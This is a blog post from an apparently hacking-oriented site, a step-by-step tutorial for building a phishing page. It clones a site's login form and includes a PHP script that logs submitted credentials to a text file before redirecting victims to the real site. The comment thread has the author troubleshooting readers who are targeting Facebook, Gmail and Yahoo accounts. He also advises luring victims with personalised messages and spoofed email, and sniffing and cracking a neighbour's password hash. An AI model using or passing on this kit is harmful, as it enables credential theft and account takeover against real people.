Fake login page
I’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.
- Select a target website and navigate to their login page.
- Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
- You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
- Create a PHP file and name it “phish.php”.
- Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.
<?php Header("Location: http://www.RealSite.com"); $handle = fopen("list.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); }fwrite($handle, "\r\n"); fclose($handle); exit; ?>6. Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL. The HTML code should start with something like this: <form action =”sitelinkhere.com” method=”GET” >
7. Once everything is complete, upload the files to a free webhost that supports PHP.
8. That’s it! You’ve just created a phishing page.UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.
If you would like a more in depth explanation that includes many pictures and specific examples, I’d reccomend obtaining The Hacker’s Underground Handbook.
(10 votes, average: 4.20 out of 5)
Loading ...
[...] Phishing – Phishing is by far the most used and easiest method. The attacker simply sets up a page that looks exactly like the real email login page and tricks people into entering their login information. Update: Check out the new post on how to create your own phishing page here. [...]
can u plx provide me login script
The login form will already be there when you save the whole site page. And the script that logs the user info is in this post.
what u write is old school , now they use function_mail()
they encode the email using base64 or array .
they gonna receive the results of the sp4ming 0peration in their inb0x
lmao “encode the email using base64 or array”, never seen array encoding…
what if i “Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)” and page is a PHP file what should i do then…
u say that “You will now have an HTML file and a folder full of images and maybe some JavaScript files.” but i got a PHP file not HTML files…
can u mail me or replay hear and tell me what to do?
If the login page is a “.php” file, Firefox will save it as “login.php.htm” so it still comes out as an HTML. Then, like it says in the post, you will need to change the action=”" location to the new PHP file that you create as shown above. Let me know if you have any more problems.
it save`s me page as “login.php” not as “login.php.htm”
would you show me how do you do it?
i can give you access to my computer with team viewer 4…
Well, then you’ll have to rename it into an HTML file or just leave it as .php and edit it that way. The PHP file is only HTML, because there is no way you could save the site’s PHP code.
If you want to run the .php file on your local machine to see what it looks like, install WAMP http://www.wampserver.com on Windows or MAMP if you are on a mac.
LooooL how do i create a PHP file?? do i need a special programm or something??
i need the exact procedure… please!!!!
Nope you don’t need any special program. To create a php file all you need is to rename the file from .html to .php and add the php code to it. Nothing special.
When I try to see if this works and login myself through phishing
page, the page doesn´t load and i get a message:
File /C:/Documents and Settings/Silven/Desktop/phish.php?ltmpl=default<mplcache=2&continue=http://mail.google.com/mail/?shva=1&service=mail&rm=false<mpl=default<mpl=default&scc=1&Email=adad&Passwd=adad&rmShown=1&signIn=Prijava&asts= could not be found.
Help?
Silven, this errors means that the phishing file you are redirecting the login page to cannot be found. If the file phish.php is not on your desktop then it won’t work because according to the error, it is looking for phish.php on your desktop. If you can’t figure it out, shoot me an email from the contact page and i will help you out.
dear author i have done the above mentioned procedure, when i fill in login details on fake page it says error on .php file line no so and so though i have just copy and pasted the php file code have cheked it several times for error the code is same as mentioned here. can u plz suggest wht is the solution , have u tried this urself , m saying earlier i have used fake logins and they worked ,the procedure was same its not working now m trying with gmail page.
Hey Amit,
Thanks for bring this up. It looks like when I pasted the code into my text editor, it changed the “”’s into a different form which caused a parse error. It should be working fine now.
fdddddddddddddddddddddd
hey,i have done everything i can do, but the thing is ,i have pasted the code correctly,bat every time i check the fake site ,it redirrects to the original site,but dont save the username and password in list.txt…………………….please help
if you want you can check the websit tis http://www.sexygo.110mb.com……………..
Send me via the contact form exactly what you have in your .php file and a screenshot of your file manager showing your file hierarchy in 110mb control panel and I will be able to tell you what the problem is.
long time no see =)
i was away from computer four a wile…
that WAMP u gave me…
i can`t get it how it works…
now i`m interested in hacking pass…
can u help?
just tell me where to talk about that if you can help…
So just install the wamp and then get it going. Once you have it installed click its icon in the taskbar and select www Directory. This is where you put all the files that I tell you about in this post. Once they are in there you can access them by opening your browser and going to http://localhost/folderitsin/filename.html
Hello!!
I installed wamp,put all the files in the www directory, got it running (server is online),
selected the www directory and clicked the index.html
to see if the whole thing works, but after “logging in”
i got an error message saying something like page could not
be opened because the protocol localhost is not connected to
any programm.
Help??
bye
@Miha
Hmm… Did you try turning on wamp and going to the page by going to http://localhost/yourfolder/index.html ? If that still doesn’t work, take a screen shot and email it to me so I can help you out.
I tried to make a webpage but received the error
Forbidden
You don’t have permission to access /â€localhost://checklogin.php†on this server.
The code I’m using in the login page is:
Enter your username and password to login:
Username:
Password:
Remember my username and password on this computer:
is it correct?
Well what you have shown is not the actual code. Send me the actual code the url you go to, to access the page and i will be able to tell you a solution.
Oh sorry
Enter your username and password to login:
Username:
Password:
Remember my username and password on this computer:
- and the checklogin.php code:
$value) {fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
What the hell, the code doesn’t appear.. how can I do that?
Hey, sorry for all my mistakes. Already made it works with some quickly PHP learning. Thanks
Np, and Great! Learning on your own is always the most beneficial way.
dear author! i had understand this concept but i did not understand the 6.paragraph.please send me the details of this step.
i also want to know that how to make an .php file.
To make a .php file simply open up notepad and paste in the php code. Then save the file as “anything.php” . It is now a .php file
. As for the details, send me an email via the contact form and I’ll help you out.
will u make a xbox fake login forme please author
I really don’t have the time for that, but you can follow the same procedure to create one on your own.
So, i renamed (take meebo.com as example) meebo.com at index.html , made text.txt file and left meebo.com_files map , how to proceed? I don’t now how to make php file and from what to make php file.
Just copy and paste the code into notepad and save it as .php .
i am new to phishing i would say your post didnt help at all,it too complicated can you help simplyfy it or tell/show me whatever way i can understand how phishing works.thank u
how can i know that the login page is fake or not to prevent myself from phishing?
a simple way is just looking at the URL to make sure its the real website.
I have followed your instruction, I downloaded complete web page with firefox, I made changes in index.html – changed method to “get” and typed my free 110mb website adress after “action=”, I created login.php by pasting above message to wordpad and than saving it as .php file type, than I typed my free web page adress in php file “location:”, finally I uploaded it to my web page, I made new directory for the files linked to index.html, but it doesn’t work, can you help me please?
When I open click index.html it redirects me to http://www.dreamstock.com/dreamtemplate-offer.shtml;
Send me the code in the contact page and I’ll let you know if I find anything wrong…now, if its supposed to be redirecting to that page, and is showing you a 404, its probably because you have an extra “;” at the end.
David, pleeeaaassseeee! I’ve sent you the code, plzz reply me!
how can i create a PHP file.
whether any software is requred or not?
just paste the code into notepad and name the file anything.php , by just naming it “.php” it turns into a php file.
Ok, I need some help with the email redirecting for the phishing page…
Like I want to put it HTML, so it will look like click “HERE” or something.and I wander if can make it close the current page as well so only the phishing will remain. Can i use this one:
and also how to cover the fake page address with clickable plain text?
To make a link with HTML it would look something like this: NVM my code script isnt working right now and it interprets the html.. go here for a tutorial on making links: http://www.w3schools.com/HTML/html_links.asp
Sorry I saw I forgot paste the code itself:
It will be way more convenient if the original page with the letter closes and only the fake one stays…Otherwise if the mail box is open and another window pop up.Actually the best will be if it opens the fake one in the same window, but Im not sure if the mailbox supports that. I think it opens all links in new window.
Oh, I get it now
My bad
http://www.computerhope.com/issues/ch000178.htm
I tested for facebook 100% suksess
Hey I did as u said but it redirrects to the original site,but dont save the username and password in list.txt..help me please…
The changes in index.html for yahoo.com
and for phish.php
$value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
THanks
in index.html
form method=”post” action=”phish.php” autocomplete=”off” name=”login_form” onsubmit=”return hash2(this)”
If it’s not writing to the file, you might have to CHMOD it to 777 so that the file has permission to be written to.
I had done that already..it was of no use
its because you need to change the form method from post to get
hi author,, hope ur fine, i got a challenge. i wanna hack somebodys yahoo id.
plz help me. its urgent. i didnt understant ur script, can u plz tell me briefly and send me the detail mail?
indigo_u@yahoo.com
m waiting
thanks
hey! where do you all host your website? I hosted at a site and it banned my page. Is there an method to host this phish page?
i dont get how to make a .php file. can you help me
nvm
i have made the file and everything and it DID all work. now when i open the index page it redirects me to
http://www.dreamstock.com/dt/dreamtemplate-offer.shtml
WHY IS THIS AS I DID GET IT WORKING 2 SECONDS BEFORE
IM TRYING IT ON FACEBOOK
dear author my problem is the same my code redirects to the page as written in the php file but does not write it in list.txt file.help needed.
Make sure the list.txt is chmod to 777
can’t help you unless i see the code.
Well they can get easily banned from any host, but if you create them in a subfolder and not the main page then there’s less of a chance that it will be.
fuckkkkkkk i was a n00b it works it wooooorks i am proud of myself facebook go home you-re small hahahaha
Good for you lol
hai just going to use this after that i’ll tell u how is it……
thanq……..
Hi Author David,
I Created .php and list, where i have to upload and . what i have to do?
please explain .. breafly..
You need to upload it to whatever web server you are using to you could point to people to that page. There are many free hosing websites that you could use out there.
hey authur i want u to explain step 6 plzzz…where will i get this form action =”sitelinkhere.com” method=”GET” >
i tried to find but i cant wat to do..?
Hi David,
I have done everything successfully and also when I try to log in my phishing site first time unsuccessful but later I get successful.But the problem is I am not getting any log in info in my List.txt.It is not capturing anything at all.What should I do..??Can you please help me with this.Thanks
Dear David,
I have upload that to the server but the problem is list.txt is not capturing anything at all.Can you please help me.Or can I get your mail tha I can send to you for have a look.Your help will be much appriciated,thanks
@jalal You need to change the action which is the part that redirects you to the next page when you hit submit to go to your phish page, which will capture the information and redirect them to the real site. You need method to be set to get. If it already is, then leave it if it’s POST then change it to GET.
@Alakbd Make sure that the list.txt file is writable. This means it needs to be chmoded to 777 on your host.
@Pearson Try doing the same thing as above^^ let me know if you do and still have the same problem.
hello David! i really cant do ur procedures because i dont have idea at all about it. can you make a fake log in with this site: wap.pinoy9.com then send me the fake log in with my email: silversoul_23@yahoo.com TNX! i hope u wil help me a lot and thats much i appreciate. tnx. i wil wait for your mail!
Sorry, I don’t do requests, and I teach for educational purposes, so that’s another reason why I can’t. Figure it out and if you get stuck shoot me an email, i’ll help ya out!
Phishers are so easy to make. I have one and im only 13. Feel free to email me zakkiboii@hotmail.com
so dumb question…..probably very dumb…..you can’t perform this from a remote pc?
well, you are hosting the file on another server.. so it already is being done on a remote pc.. so i don’t understand what you’re getting at.
hey david_author).. i reali dun understand your step 6..may i know wer do i find the action link?the form code..coz there’s alot of codes and i dont know wer is it..im doin phish for facebook..help me out plz?
Hey… Very nice tutorial, and a very 10 star book.. Thanks a lot for a good explained book for a beginner to understand.. I tried to make this phishing tut and put it in my own server qnap ts 239 pro.. And all I get is an error, that I don’t have the permission to read the phish.php file… How can that be..???
Thanks in advance…… Starfighter55
Hey Starfighter, paste the error and I’ll try to help you out
You look for the action code in the saved HTML code of the site you are making the phishing page for.
Hey David…..
I got it, you answered me in the e-mail and the issue is now solved… It was the quotations from the pdf file who make the foul.. I used the php file from the top of this page and that works..
Thanks….
Starfighter55
Hi dude this is so much fun to do! i do it on aol.com all the time… i’m just kidding….. but still i do it on my own website which is kinda stupid but it’s cool that when i enter mine into it i get it a couple minutes later…. well thanks for telling everyone else this and i may need to check reference every now and again….. well thanks!!
- Chris Caprio
i try but it not proper work….
What the problem? maybe i can help.
[...] Fake login page [...]
CrackerCast Episode 03 – Phishing…
CrackerCast Episode 03 covers the ever popular topic of Phishing. Like always, you can send your feedback and questions to comments[at]MrCracker.com or leave a comment on the blog. Let me know……
Im done with page and uploaded it…it works perfect (thanks a lot David)
So now I need to forge some e-mail…using a mail that look like the one they know will give me the best chance of sucssess
I found few online addresses such as
http://fmail.net.ms/ or
http://sendnow.x10hosting.com/sendmail.p…il%20Sent!
but when I try to put HTML such as <a href and the adress it ads "\"in the begging and in the end making the code wrong…
I saw the telnet way but I dont know if u can send HTML with it…
Hey Holi, the reason why it ads a \ to the beginning is because your inpu t is being sanitized by the script and whenever it sees html characters it ads the slash. I have a script that should work here: http://mrcracker.com/2009/02/how-to-get-free-stuff-on-the-internet-via-social-engineering/
hey pls help me to make a php file
shamnad, just paste the code into a file and name it anything you want and end it with .php and that will make it a php file.
Ok, I feel like a total dink. I can’t even save the page as> Do you know about how much room a login page like PB requires? I tried saving to an external drive and the desktop, I got an error for both. I only have like 4 GB free on the computer. Do you think that’s why I can’t save it? Thanks for posting and taking the time to answer dumb questions.
No.. you need a couple MB at the most. You should go to file save as.. and it should save it without a problem. What kind of error do you get?
It just says file can not be saved to this destination, which is why I thought it might be a space issue. But only a few MB I have room for. I’m on computer at someone else’s work, but I can’t imagine the network admins are blocking any downloads. I’ve downloaded other programs they shouldn’t have allowed but did on this computer w/no problem. And if nothing else it at least should have worked on my thumbstick. I don’t know
Nevermind, it’s early and I’ve not been thinking to double check the processes I’ve been doing. I was trying to save the complete web page html. I forgot to change it to html only. So I got it now. But I’m sure I’ll return w/ more questions I’ve not thoroughly thought out. Thanks for helping.
hey it’s working very well but pls let me know how to redirect the page to a specified link…so that the victim will not know that it’s a fake page..
actually when the user clicks on submit…the information comes into my text document but the user gets edircted to the original orkut page..but i want him to get redirected to some other site[;)]
You can do that by inserting the redirect website in the php code where it says to put it.
i have done every thing …can you tell me proper way to send this phishing login to victim????????????
well, thanks for the post,
how do i create another file called list.txt?
Depends on who the target is. If you are trying to get a friends facebook, you can message him and be like “check out this awesome photo from “name a night she knows about” and then she’ll follow the link and most likely relogin… that personal touch just makes it more trustworthy.
If you are trying to get an email of some stranger, you can try faking as the company looking for updated information.. by spoofing the company’s email to make it look like it actually came from their emails. You can get a spoofer in teh social engineering article I have on the site.
just open up notepad and save it as “list.txt” easy as that.
hi david
thanks for reply…i really like ur style…
i wAnt tO say something..tht..
i was reading ankit fadia’s book on email hacking..there was chappter on phishing…and he hAd mentioned various techniques of Sending fake login to victin some of them are ACTIVE X ENABLED EMAIL AND HTA APPLICATIONS..SO CAN PLEASE EXPLIN AND TELL US HOW TO USE THESE TECHNIQUES…..AS HE DONT EXPLAIN THEM…..
WAITING FOR UR REPLY
THANKS
Hi David,
Great post. I’m trying to phish a wiki, on pb works, but theirs no form code, action link etc.
Is this because it’s a wiki?
Thanks
Got a link to the actual wiki?
waseem,
I’ll try to do a post or something on that topic in the near future, its to big of a topic to cover in a comment.
okay..david
besides this i wanna know how to hack computer in my own network
when i try it, it is asking for password…is there any wy to break password and plzz tell me how to use brute force attack appliction
and suggest me one which is best and easy to use….
thanks man….i really like when you reply to ur fns
it is really good
waseem,
to be able to help you i need to know what OS you are running, what service/application the password it is you are trying to get in, and to recommend a brute force app, I need to know what you are planning to brute force so I know which way to go.
Hi David,
i have opened an account in a free webhost but i dono how 2 upload the php file
im running xp…..and im tring to get in a computer …..i have read various book and articles and wacthed many tutoral vedios but all in vain…….when i try to hack a computer of my neighbour on my own network by dos aatack….i got nothing..becoz it was password protected
and i want to about bruceforce attcck becoz i want to breack password of windows, emails,password protected folders…
hope you will help me
waiting for reply….
thanx
hey david….
i used to visit ur site daily…
just waiting for reply…
thanx man …still waiting
prakash,
there should be a file manager that has an upload button. go there click browse, find the file and upload it.
hey waseem,
you also need to know what OS your target is running. if you are looking to crack his password what you can do is run “cain and abel” and since he is on your network you can set it to sniff for his password hash, once you get it you can crack it using rainbow tables. once you have his password you should have no problem doing what you wish.
thanx david
but can please tell me how to use this software..i will be very thank full to you…..teach us each and evry features of this software in your commnt or post….
thanx man….
hello David ,
i interested hacking pass .
i’m visit your site at first time.
can you help me ?
i wait your request.
thank.
Hi david, here’s the link:
http://www.asrty09.pbworks.com.
Thanks would it be easier just to phish pbworks.com?
Deicer,
Sure there is, I found 2 forms.. here’s the first for the login.
Jex,
This (phishing page) would be the best way to hack a password if you are talking about an email or social networking site password…
Waseem,
I’ll see if I can put together a post on it in the near future.
hi,david
im waiting for ur next post
you are really grate…coz you care to reply
thanx man
Hi David!
I’m very much thankful to you that you’re spreading such good information. Well, i ain’t aware of such scripting… but i’m very much interested in it. I really can’t understand what you wrote in point # 6 because of my bad english. What i did till yet that i saved the html page and renamed it then i created .php file and .txt file as you said no changes i made. Your reply would be appreciable. Thanks!
Smartrival, open index.html and search for the line that starts with <form , in that line look for POST and change it to GET and then look for action=" and change the link in between the " " to your phishing page.
Thank you very much again but there is one more query that are you talking about the web link like http://www.hotmail.com or php file destination or any other thing?
@Mr. David
when i opened index.html with notepad and tried to search the line which starts from <form using Find option it said "No found" infact only one form word i found which actually in the mid of the line. And the matter of fact is that it cannot find any thing as you said. Maybe the problem is occuring because i'm using IE 8 not firefox.
@Waseem
Are you from Pakistan?
@Smartrival, show me what page you are looking at and i’ll point it out to you.
Smartrival, I don’t exactly understand what you mean by the hotmail.com comment, rephrase please?
ok, now i’ll tell you what i have done yet.
1. I goto the login page of hotmail.com and save it.
2. Then i changed the name of it from login.html to index.html
3. Now i created list.txt and phish.php file.
Now, i wanna know that what changes should i’ve to make further?
I hope you can understand easily.
Thanks!
@Mr david, I really can’t understand.. Kindly, tell me what to do further?
Next you need to open up Index.html and find
can anyone tell me how to check or find the list of emails that registered for a site…………is there any hack to it thanks
Sure it’s possible, you’d need to get to their email database.. or if they are running cpanel, just get access to that.. if you are talking about any of the giant email providers like gmail or yahoo then you can just forget about it.. because you’ll get no where.
Hi David
I am beginner in this computer hacking i want to learn this subject(hacking) will u please help me or some ebooks how to start from the beginning
The best ebook for a complete beginner would be The Hacker’s Underground Handbook at http://www.learn-how-to-hack.net
Do u have the link of that book “The Hacker’s Underground Handbook” in ebook format so that i can read it directly????
if u have then plz let me know?
Hello David, is the page down? http://www.learn-how-to-hack.net is not loading?
Yup the ebook is sold right on the website, learn-how-to-hack.net
the server was hit wit ha ddos attack, but it was all taken care of.
Leave your response!
MrCracker.com Hacker Newsletter
Subscribe via RSS or Subscribe via email.
Archives
Blogroll
Categories
Recent Posts
Most Commented
Most Viewed